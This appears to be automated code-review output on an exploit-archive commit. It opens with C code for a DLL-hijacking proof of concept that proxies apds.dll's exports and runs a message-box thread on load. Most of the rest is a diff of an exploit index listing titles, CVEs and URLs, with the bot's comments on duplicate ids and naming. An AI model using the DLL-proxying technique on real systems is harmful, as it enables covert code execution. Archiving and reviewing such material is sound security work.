    exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD);
    ourExportDirectory->AddressOfNames = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase);
    // Copy names and apply delta to all the RVAs in the new name table
    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) {
        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]);
        DWORD length = (DWORD)strlen((LPCSTR)realAddress);
        CopyMemory(exportData, realAddress, length);
        newNameTable[i] = (DWORD)((PBYTE)exportData - (PBYTE)ourBase);
        exportData += length + 1;
    }
    // Copy Ordinal Table
    PINT newOrdinalTable = (PINT)exportData;
    CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirectory->NumberOfFunctions * sizeof(USHORT));
    exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
    ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase);
    // Set our counts straight
    ourExportDirectory->NumberOfFunctions = targetExportDirectory->NumberOfFunctions;
    ourExportDirectory->NumberOfNames = targetExportDirectory->NumberOfNames;
    if (!VirtualProtect(
        ourExportDirectory,
        64, oldProtect,
        &oldProtect)) {
        return FALSE;
    }
    if (!VirtualProtect(
        sideAllocation,
        totalAllocationSize,
        PAGE_EXECUTE_READ,
        &oldProtect)) {
        return FALSE;
    }
    return TRUE;
}
// Executed when the DLL is loaded (traditionally or through reflective injection)
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    HMODULE realDLL;
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL);
        realDLL = LoadLibrary(L"C:\\Windows\\System32\\apds.dll");
        if (realDLL)
            ProxyExports(hModule, realDLL);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
--------------------------
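Review bot: in `DllMain`, the `DLL_PROCESS_ATTACH` case has no `break` and falls through into the other cases (harmless only because they just `break`), and it calls `LoadLibrary` and `CreateThread` while the loader lock is held, which Microsoft documents as unsafe inside `DllMain`; move that work out of the entry point or at least note the limitation. In `ProxyExports`, the first `CopyMemory` into `newFunctionTable` copies from `AddressOfNames` rather than `AddressOfFunctions`; the loop below overwrites every entry, so it works by accident, but the source should be corrected. On the write-up: step 2 copies the DLL into `C:\Windows\`, which requires administrative rights, so state that prerequisite up front; a hijack that needs admin to plant the file crosses no privilege boundary, and that determines the severity.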


@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
51496,exploits/go/webapps/51496.txt,"Pydio Cells 4.1.2 - Unauthorised Role Assignments",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32749,,,,,
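Review bot: not introduced by this change, but the context shows two rows with id 46508 that differ only in column 13 (`Metasploit Framework (MSF)` vs `Local`); the same pattern appears for 44176 in the hardware/remote hunk below. Duplicate ids in the index break lookups by id and should be collapsed into one row in a follow-up.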
@ -3206,6 +3207,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4319,exploits/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,dos,hardware,,2007-08-26,2016-10-27,1,CVE-2007-4553,,,,,
30530,exploits/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",dos,hardware,,2007-08-27,2016-10-27,1,CVE-2007-4553;OSVDB-39850,,,,,https://www.securityfocus.com/bid/25446/info
25124,exploits/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,dos,hardware,,2005-02-19,2013-05-01,1,CVE-2003-1085;OSVDB-14022,,,,,https://www.securityfocus.com/bid/12595/info
51730,exploits/hardware/dos/51730.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service",2023-10-09,LiquidWorm,dos,hardware,,2023-10-09,2023-10-09,0,,,,,,
11043,exploits/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,dos,hardware,,2010-01-05,,0,,,Sony_Ericsson.rar,,,
48255,exploits/hardware/dos/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,dos,hardware,,2020-03-26,2020-03-26,0,CVE-2020-9375,,,,,
40910,exploits/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",dos,hardware,,2016-12-13,2016-12-13,0,,,,,,
@ -3337,6 +3339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb
43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware,,2018-01-25,2018-01-25,0,CVE-2018-6000;CVE-2018-5999,,,,,https://github.com/pedrib/PoC/blob/787b92c549c7a8ddd53740ef0fbc1e04c12a18b6/advisories/asuswrt-lan-rce.txt
51742,exploits/hardware/remote/51742.txt,"Atcom 2.7.x.x - Authenticated Command Injection",2023-10-09,"Mohammed Adel",remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,,
50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,,
50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2022-01-05,0,CVE-2021-40859,,,,,
@ -3862,6 +3865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
51138,exploits/hardware/remote/51138.txt,"Router ZTE-H108NS - Authentication Bypass",2023-03-30,"George Tsimpidas",remote,hardware,,2023-03-30,2023-03-30,0,,,,,,
18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware,,2012-04-24,2012-04-24,0,CVE-2012-2441;OSVDB-81406;CVE-2012-1803,,,,,
51727,exploits/hardware/remote/51727.txt,"Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)",2023-10-09,"Riyan Firmansyah of Seclab",remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",2022-05-11,"Minh Khoa",remote,hardware,,2022-05-11,2022-05-11,0,CVE-2021-43164,,,,,
35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware,,2011-05-25,2015-01-16,1,,,,,,https://www.securityfocus.com/bid/47976/info
35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware,,2011-07-27,2015-02-06,1,,,,,,https://www.securityfocus.com/bid/48908/info
@ -3942,6 +3946,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9432,exploits/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",remote,hardware,,2009-08-12,,1,,,,,,
829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,remote,hardware,80,2005-02-18,,1,OSVDB-14023;CVE-2005-0494,,,,,
10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware,,2009-12-08,,0,OSVDB-104795,,,,,
51732,exploits/hardware/remote/51732.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
51731,exploits/hardware/remote/51731.py,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware,,2016-08-19,2017-11-22,0,,,,,,
51677,exploits/hardware/remote/51677.py,"TP-Link Archer AX21 - Unauthenticated Command Injection",2023-08-10,Voyag3r,remote,hardware,,2023-08-10,2023-08-10,0,CVE-2023-1389,,,,,
38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware,,2015-09-15,2015-09-15,0,OSVDB-127536,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
@ -9870,6 +9876,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23181,exploits/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",dos,multiple,,2003-09-24,2012-12-06,1,OSVDB-3571,,,,,https://www.securityfocus.com/bid/8697/info
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,,2020-12-17,2021-01-11,0,CVE-2020-35488,,,,,
10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389,2009-11-08,,1,,,,,,https://www.securityfocus.com/bid/27778/info
51746,exploits/multiple/dos/51746.txt,"OpenPLC WebServer 3 - Denial of Service",2023-10-09,"Kai Feng",dos,multiple,,2023-10-09,2023-10-09,0,,,,,,
17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple,,2011-08-05,2011-08-05,0,CVE-2010-3609,,,,http://www.exploit-db.comopenslp-1.2.1.tar.gz,
2444,exploits/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service",2006-09-27,"Tavis Ormandy",dos,multiple,,2006-09-26,2016-09-12,1,OSVDB-29152;CVE-2006-4924,,,,http://www.exploit-db.comopenssh-4.1p1.tar.gz,
18756,exploits/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",dos,multiple,,2012-04-19,2012-04-19,1,CVE-2012-2131;OSVDB-81223;CVE-2012-2110,,,,,
@ -12172,6 +12179,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",webapps,multiple,,2014-02-28,2014-02-28,0,CVE-2013-6231;OSVDB-103890,,,,,
48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,,2020-09-18,2020-09-18,0,CVE-2020-11804;CVE-2020-11803;CVE-2020-11700;CVE-2020-11699,,,,,
21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",webapps,multiple,,2012-09-04,2012-09-04,0,OSVDB-85824,,,,,
51747,exploits/multiple/webapps/51747.py,"Splunk 9.0.5 - admin account take over",2023-10-09,"Redway Security",webapps,multiple,,2023-10-09,2023-10-09,0,CVE-2023-32707,,,,,
41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,webapps,multiple,,2017-03-31,2017-03-31,1,CVE-2017-5607,,,,,
40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,webapps,multiple,,2016-12-09,2016-12-09,1,,,,,,
49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,,2020-12-21,2020-12-21,0,,,,,,
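Review bot: the description on row 51747, "Splunk 9.0.5 - admin account take over", does not follow the title-case convention of the surrounding rows ("Arbitrary File Read", "Information Disclosure", "Server-Side Request Forgery"); suggest "Splunk 9.0.5 - Admin Account Takeover". While touching the row, verify against the exploit header that 9.0.5 is the affected version and not the release that fixed CVE-2023-32707, since the version string is the only one the index will show.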
@ -14990,6 +14998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11249,exploits/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,webapps,php,,2010-01-23,,0,,,,,,
18676,exploits/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,webapps,php,,2012-03-28,2012-08-13,1,OSVDB-80660,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-06-at-21926-pm.png,http://www.exploit-db.combmachine-3.1.zip,
5858,exploits/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46425;CVE-2008-2846,,,,,
51741,exploits/php/webapps/51741.py,"BoidCMS v2.0.0 - authenticated file upload vulnerability",2023-10-09,1337kid,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-38836,,,,,
30575,exploits/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38668,,,,,https://www.securityfocus.com/bid/25644/info
30576,exploits/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38669,,,,,https://www.securityfocus.com/bid/25644/info
2153,exploits/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",webapps,php,,2006-08-08,,1,OSVDB-29747;CVE-2006-4123,,,,,
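Review bot: row 51741, "BoidCMS v2.0.0 - authenticated file upload vulnerability", is lower-case and carries a redundant "vulnerability"; the index names this class "Arbitrary File Upload" (row 11249 three lines up) and marks the auth requirement with a trailing "(Authenticated)" (compare row 48817 in the previous hunk). Suggest "BoidCMS 2.0.0 - Arbitrary File Upload (Authenticated)".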
@ -15226,6 +15235,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12338,exploits/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",webapps,php,,2010-04-21,,1,CVE-2010-1431;OSVDB-63967,,Bonsai-SQL_Injection_in_Cacti.pdf,,,
33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php,,2009-11-21,2014-05-16,1,CVE-2009-4032;OSVDB-60566,,,,http://www.exploit-db.comcacti-0.8.7e.zip,https://www.securityfocus.com/bid/37109/info
49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",2021-04-29,"Leonardo Paiva",webapps,php,,2021-04-29,2021-10-29,0,CVE-2020-14295,,,,,
51740,exploits/php/webapps/51740.txt,"Cacti 1.2.24 - Authenticated command injection when using SNMP options",2023-10-09,"Antonio Francesco Sardella",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-39362,,,,,
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,,
33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
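Review bot: the description on row 51740, "Authenticated command injection when using SNMP options", reads as a sentence rather than an index title and puts the auth qualifier first, unlike the other Cacti rows in this hunk; suggest "Cacti 1.2.24 - Command Injection via SNMP Options (Authenticated)".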
@ -15569,7 +15579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info
15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip,
7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,,
51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,,
51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-10-09,0,CVE-2023-31714,,,,,
31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info
31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info
31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info
@ -15719,6 +15729,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3542,exploits/php/webapps/3542.txt,"ClassWeb 2.0.3 - 'BASE' Remote File Inclusion",2007-03-22,GoLd_M,webapps,php,,2007-03-21,2016-09-30,1,OSVDB-37215;CVE-2007-1640;OSVDB-37214,,,,http://www.exploit-db.comclassweb_2.03.tar.gz,
34365,exploits/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",webapps,php,,2010-07-22,2014-08-19,1,,,,,,https://www.securityfocus.com/bid/41885/info
42773,exploits/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",webapps,php,,2017-09-24,2017-09-24,0,CVE-2017-14704,,,,,
51729,exploits/php/webapps/51729.txt,"Clcknshop 1.0.0 - SQL Injection",2023-10-09,CraCkEr,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4708,,,,,
7230,exploits/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,webapps,php,,2008-11-24,2017-01-03,1,OSVDB-50174;CVE-2008-5289,,,,,
7228,exploits/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-50174;CVE-2008-5290;OSVDB-50172;CVE-2008-5289,,,,,
46146,exploits/php/webapps/46146.txt,"Cleanto 5.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80,2019-01-14,2019-01-14,0,,"SQL Injection (SQLi)",,,,
@ -16213,6 +16224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30803,exploits/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",webapps,php,,2007-11-24,2014-01-09,1,,,,,,https://www.securityfocus.com/bid/26558/info
27669,exploits/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1909;OSVDB-24744,,,,,https://www.securityfocus.com/bid/17570/info
18680,exploits/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,webapps,php,,2012-03-30,2012-03-30,1,OSVDB-80735;OSVDB-80734;OSVDB-80733;OSVDB-80732;OSVDB-80731;CVE-2012-1614;CVE-2012-1613,,,,http://www.exploit-db.comcpg1.5.18.7z,http://www.waraxe.us/advisory-81.html
51738,exploits/php/webapps/51738.txt,"Coppermine Gallery 1.6.25 - RCE",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal",2017-02-15,"Hacker Fantastic",webapps,php,,2017-04-13,2019-03-28,0,,,,,,https://github.com/HackerFantastic/Public/blob/9a2eaaab7d8ea74afeb45703db106b2c0ab47fba/exploits/cpg15x-dirtraversal.txt
37437,exploits/php/webapps/37437.txt,"Coppermine Photo Gallery - 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54115/info
22473,exploits/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",webapps,php,,2003-04-07,2012-11-12,1,OSVDB-50624,,,,,https://www.securityfocus.com/bid/7300/info
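Review bot: row 51738 abbreviates the class to "RCE" and has an empty CVE column; elsewhere in this same commit the index spells the class out as "Remote Code Execution (RCE)" (row 51728), so use the expanded form here, and confirm that no CVE exists for the 1.6.25 issue before publishing the row without one.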
@ -16407,7 +16419,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php,,2008-09-25,,1,OSVDB-49048;CVE-2008-4484;OSVDB-48660,,,,,
31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-0700;OSVDB-41520,,,,,https://www.securityfocus.com/bid/27588/info
35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,,2010-12-26,2014-11-04,1,,,,,,https://www.securityfocus.com/bid/45594/info
51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-08-21,0,CVE-2023-37759,,,,,
51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-10-09,0,CVE-2023-37759,,,,,
32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,webapps,php,,2009-04-23,2014-04-21,1,,,,,,https://www.securityfocus.com/bid/34700/info
27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php,,2005-12-25,2013-07-23,1,CVE-2005-4429;OSVDB-21370,,,,,https://www.securityfocus.com/bid/16134/info
31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,webapps,php,,2008-03-19,2014-02-06,1,CVE-2008-1458;OSVDB-43353,,,,,https://www.securityfocus.com/bid/28333/info
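Review bot: the only visible difference between the two 51688 rows is date_updated moving from 2023-08-21 to 2023-10-09; description, author, CVE-2023-37759 and every other column are unchanged. Confirm that exploits/php/webapps/51688.txt itself was modified in this commit, otherwise the timestamp bump is noise in the index.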
@ -19162,6 +19174,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51418,exploits/php/webapps/51418.py,"GLPI 9.5.7 - Username Enumeration",2023-05-02,"Rafael B.",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,,
51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,,
51726,exploits/php/webapps/51726.py,"GLPI GZIP(Py3) 9.4.5 - RCE",2023-10-09,"Brian Peters",webapps,php,,2023-10-09,2023-10-09,0,CVE-2020-11060,,,,,
51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,,
34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
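Review bot: row 51726, "GLPI GZIP(Py3) 9.4.5 - RCE", puts a technique tag and an implementation language in the product slot, which breaks the "<product> <version> - <issue>" form the other GLPI rows in this hunk follow and will sort oddly; suggest "GLPI 9.4.5 - Remote Code Execution (RCE) (Python 3)" and keep the gzip detail in the exploit header. The row reuses CVE-2020-11060 with a 2023 publication date, which is fine for a port but should be stated as such in the description so it is not mistaken for a new issue.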
